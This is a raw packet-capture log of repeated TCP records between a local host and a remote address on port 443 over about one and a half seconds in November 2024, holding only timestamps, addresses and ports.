                                                                                        Nov 18, 2024 08:30:14.596913099 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.596925974 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.596946955 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.596981049 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.597023010 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.606301069 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.606324911 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.606403112 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.606416941 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.606461048 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.621923923 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.621949911 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.622044086 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.622071028 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.622111082 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.867108107 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.867136002 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.867259979 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.867311001 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.867389917 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.884008884 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.884032965 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.884124994 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.884145021 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.884190083 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.922447920 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.922472000 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.922523022 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.922543049 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.922559977 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.922669888 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.938855886 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.938884974 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.938926935 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.938941956 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.938968897 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.938986063 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.969525099 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.969544888 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.969588041 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.969604015 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.969624043 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.969650984 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.985960007 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.985977888 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.986047029 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:14.986066103 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:14.986103058 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.003576040 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.003598928 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.003681898 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.003717899 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.003770113 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.126523972 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.126545906 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.126601934 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.126621962 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.126663923 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.143249035 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.143265009 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.143326044 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.143335104 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.143373966 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.173492908 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.173511982 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.173593044 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.173625946 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.173672915 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.204752922 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.204768896 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.204832077 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.204840899 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.204880953 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.236417055 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.236429930 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.236509085 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.236521006 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.236557961 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.251682043 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.251708031 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.251751900 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.251761913 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.251790047 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.251805067 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.281774998 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.281791925 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.281896114 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.281909943 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.281949043 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.298023939 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.298041105 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.298110008 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.298151970 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.298172951 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.298193932 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.328949928 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.328970909 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.329067945 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.329078913 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.329121113 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.345037937 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.345053911 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.345127106 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.345135927 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.345179081 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.375711918 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.375730038 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.375788927 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.375797987 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.375839949 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.392251968 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.392270088 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.392333031 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.392340899 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.392378092 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.409636974 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.409655094 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.409742117 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.409749985 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.409790039 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.437913895 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.437935114 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.438021898 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.438060999 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.438107014 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.454268932 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.454287052 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.454350948 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.454360008 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.454396963 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.484792948 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.489376068 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.489397049 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.489448071 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.489465952 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.489500999 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.489521027 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.493170023 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.511014938 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.511030912 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.511077881 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.511089087 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.511107922 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.511138916 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.529419899 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.529443026 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.529495955 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.529530048 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.529550076 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.529582024 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.563997984 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.564024925 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.564116001 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.564155102 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.564202070 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.579125881 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.579148054 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.579247952 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.579287052 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.579334974 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.599276066 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.599294901 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.599344015 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.599380016 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.599400997 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.599425077 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.625791073 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.625816107 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.625884056 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.625916958 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.625961065 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.656728029 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.656750917 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.656805038 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.656841993 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.656863928 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.656886101 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.672183037 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.672199011 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.672262907 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.672298908 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.672358036 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.688358068 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.688374996 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.688433886 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.688467979 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.688522100 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.719183922 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.719199896 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.719255924 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.719290972 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.719310999 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.719336987 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.735253096 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.735276937 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.735341072 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.735373974 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.735413074 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.751075029 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.751097918 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.751161098 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.751197100 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.751214981 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.751240969 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.782423973 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.782444954 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.782566071 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.782589912 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.782623053 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.782641888 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.797884941 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.797904015 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.797964096 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.797998905 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.798017979 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.798043013 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.813666105 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.813683033 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.813770056 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.813803911 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.813847065 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.844083071 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.844103098 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.844196081 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.844222069 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.844264984 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.860312939 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.860332012 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.860409975 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.860440016 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.860460043 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.860481977 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.861192942 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.861217976 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.861258984 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.861268044 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.861304045 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.876646996 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.876663923 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.876758099 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.876790047 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.876837015 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.891902924 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.891921997 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.892004967 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.892023087 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.892066002 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.907615900 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.907639980 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.907850027 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.907885075 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.907939911 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.923135996 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.923156023 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.923217058 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.923228979 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.923261881 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.923273087 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.938709974 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.938729048 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.938842058 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.938852072 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.938909054 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.953982115 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.954004049 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.954186916 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.954221010 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.954279900 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.970129013 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.970150948 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.970197916 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.970207930 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:15.970237970 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:15.970248938 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.000497103 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.000528097 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.000718117 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.000751972 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.000806093 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.015964985 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.015984058 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.016030073 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.016037941 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.016077042 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.016096115 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.017050028 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.017065048 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.017132998 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.017143965 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.017359018 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.032495022 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.032512903 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.032685995 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.032720089 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.032773018 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.048384905 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.048404932 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.048472881 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.048487902 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.048528910 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.048538923 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.078609943 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.078635931 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.078702927 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.078717947 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.078758955 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.094048023 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.094069958 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.094269991 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.094302893 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.094374895 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.095482111 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.095504045 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.095568895 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.095578909 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.095624924 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.110400915 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.110420942 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.110501051 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.110532999 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.110600948 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.125371933 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.125391960 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.125443935 CET49700443192.168.2.7218.208.91.137
                                                                                        Nov 18, 2024 08:30:16.125453949 CET44349700218.208.91.137192.168.2.7
                                                                                        Nov 18, 2024 08:30:16.125483990 CET49700443192.168.2.7218.208.91.137
